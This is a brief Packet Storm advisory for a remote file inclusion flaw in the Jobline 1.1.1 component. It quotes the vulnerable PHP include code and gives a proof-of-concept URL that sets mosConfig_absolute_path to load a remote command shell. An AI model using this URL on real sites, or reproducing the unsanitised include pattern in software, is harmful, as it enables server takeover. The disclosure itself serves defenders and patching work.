Jobline version 1.1.1 suffers from a remote file inclusion flaw.
17d8c77877ed3a395378b7f82c3ca3973c8817202cacdb7bc1c2e57f6b6ae166# SaVSaK.CoM | SpC-x - The_BeKiR |
# Jobline 1 1 1 Version - Remote File Include Vulnerability
# Risk : High
# Class: Remote
# Script : Jobline
# Credits : SpC-x
# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx
# Code :
# if ( file_exists( "$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php" ) ) {
# include_once("$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php");
# } else {
# include_once("$mosConfig_absolute_path/components/$option/language/english.php");
# }
# Vulnerable :
# http://www.victim.com/Jobline/admin.jobline.php?mosConfig_absolute_path=Command-Shell
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed